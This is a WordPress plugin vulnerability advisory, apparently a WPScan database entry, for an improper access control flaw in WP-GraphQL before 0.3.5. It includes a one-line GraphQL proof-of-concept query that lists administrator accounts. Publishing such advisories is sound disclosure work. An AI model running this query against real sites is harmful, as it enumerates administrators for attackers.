WordPress Plugin Vulnerabilities
WP-GraphQL < 0.3.5 - Improper Access Control
Description
The plugin doesn't properly restrict access to information about other users' roles on the affected site. Because of this, a remote attacker could forge a GraphQL query to retrieve the account roles of every user on the site.
Proof of Concept
query getUsers{ users(where:{role:ADMINISTRATOR}){ edges{ node{ userId name } } } }
Affects Plugins
References
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Rohan Pagey
Submitter
Rohan Pagey
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2019-07-10 (about 4 years ago)
Added
2022-05-02 (about 2 years ago)
Last Updated
2022-05-03 (about 2 years ago)